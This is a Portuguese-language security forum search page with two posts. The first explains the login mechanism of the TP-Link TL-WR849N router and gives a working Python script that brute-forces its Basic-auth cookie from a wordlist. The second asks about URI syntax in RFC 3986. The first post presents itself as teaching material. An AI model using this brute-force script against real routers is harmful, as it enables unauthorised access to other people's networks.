Jump to content

Search the Community

Showing results for tags 'pentest'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • nada
  • Mente Binária
    • Núcleo
    • General
    • Arquitetura de Computadores
    • Certifications
    • Quantum computing
    • Cryptography
    • Challenges and CTF
    • Hardware Hacking
    • Electronics
    • Conferences
    • Forensics
    • Games
    • Data privacy and laws
    • Code breaking
    • Netoworking
    • Pentest
    • Speak to us!
  • Career
    • Study and profession
    • Oportunidades
  • Reverse Engineering
    • General
    • Malware Analysis
    • Firmware
    • Linux and UNIX-like
    • Windows
  • Programming
    • Assembly
    • C/C++
    • Python
    • Other languages
  • Sistemas operacionais
    • GNU/Linux and UNIX-like
    • Windows
  • Segurança na Internet's Discussão

Categories

  • Crackmes
  • Documentação
  • Debuggers
  • PE tools
  • Books
  • Util
  • Packers
  • Unpackers

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Como veio parar aqui?


Website


Github/Gitlab


LinkedIn

Found 2 results

  1. Tools Router Brute Ferramenta para executar ataque de força bruta em roteadores TPLink. Download código completo: https://github.com/WalderlanSena/toolsrouterbrute Modelo Roteador Wireless N 300Mbps TL-WR849N Velocidade wireless de 300Mbps ideal para aplicações sensíveis a interrupções, como streaming de vídeo em HD Fácil configuração da criptografia de segurança da rede wireless com um simples toque no botão WPS Controle de banda baseado em IP permite aos administradores determinarem que largura de banda será alocada para cada computador WDS wireless bridge fornece perfeita ponte para expandir a rede wireless. Site: https://www.tp-link.com/br Funcionamento da Autenticação do TP-Link - TL-WR849N Capturando url atual e subscrevendo o valor para o link definido no replace e redirecionando o usuário. Criando uma variável isLocker e atribuindo o valor false a mesma. Deletando o cookie Authorization, vulgo responsável pela a autenticação. var url = window.location.href; if (url.indexOf("tplinklogin.net") >= 0) { url = url.replace("tplinklogin.net", "tplinkwifi.net"); window.location = url; } var isLocked = false; deleteCookie("Authorization"); Função responsável implementar a hash base64, que é utilizada para setar o cookie de autenticação. function Base64Encoding(input) { var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; var output = ""; var chr1, chr2, chr3, enc1, enc2, enc3, enc4; var i = 0; input = utf8_encode(input); while (i < input.length) { chr1 = input.charCodeAt(i++); chr2 = input.charCodeAt(i++); chr3 = input.charCodeAt(i++); enc1 = chr1 >> 2; enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); enc3 = ((chr2 & 15) << 2) | (chr3 >> 6); enc4 = chr3 & 63; if (isNaN(chr2)) { enc3 = enc4 = 64; } else if (isNaN(chr3)) { enc4 = 64; } output = output + keyStr.charAt(enc1) + keyStr.charAt(enc2) + keyStr.charAt(enc3) + keyStr.charAt(enc4); } return output; } Função que monitora o clique de login e captura os dados informado pelo usuário function PCWin(event) { if (event.keyCode == 13) { PCSubWin(); } } function PCSubWin() { // Verifica se o usúario não está bloqueado por alguns segundos if (isLocked == true) { return; } // Criando uma variavel que receberá o base64 referente a autenticação // E criando duas variavels para receber o userName e o password var auth; var password = $("pcPassword").value; var userName = $("userName").value; // Concatena a palavra "Basic" com a hash base64 de userName com ":" e o password auth = "Basic "+Base64Encoding(userName+":"+password); // Atribui o valor ao Cookie do navegador com a chave Authorization e com o auth como conteúdo document.cookie = "Authorization=" + auth; // Recarrega a página window.location.reload(); } Entendendo o funcionamento do nosso script que chamei de trb.py def main(): wordlist = open(sys.argv[3], 'r') count = 0 for i in wordlist: login = str(sys.argv[1]) senha = i.rstrip() auth = "Basic " authEncode = auth+base64.b64encode(login+':'+senha) cookie = {"Authorization": authEncode} response = r.get('http://'+sys.argv[2], cookies=cookie) if response.content.count('id="userName"') != 1: os.system('setterm -cursor on') print('\n\tPassword Found =====> ' + senha) exit(0) else: os.system("clear") splash() count = count + 1 print('\t[ '+ str(count) + ' ] Password not found ===> ' + senha) Primeiramente lemos a wordlist (Lista de palavra possíveis para a senha do roteador.) e o login passados via parâmetros no script. Posteriormente fazendo a encriptação do ambos os dados para base64, montando assim o cookie e enviando para o ip do roteador. Capturamos o retorno e verificamos a palavra chave retornada após o login. O script é bem simples. Servindo para compreender como as ferramentas mais complexas realizam tais operações ! Mas lembre-se, "Hacker e como escrever uma redação, você apenas tem um tema e cada um vai pensar em uma solução diferente." Grande abraço !
  2. Ola galera, Eu estava intentando entender como funcionao as URL e a diferenca entre URL e URI, entao comecei a ler os RFC1738 E RFC3986 somente que en uma parte explicando o hier-par da RFC3986 fala sobre authority path-abempty e nao consigo entender ao que se refere exatamente. tambem fiz uma procura no goole mais nao encotrei conteudo em portugues, somente en ingles e como nao sei ingles com o google translate acho que piorou kkkk.. bom se aguem puder me dar uma ajuda estaria muito grato. links: https://tools.ietf.org/html/rfc3986#section-3 https://tools.ietf.org/html/rfc3986#section-3.3
×
×
  • Create New...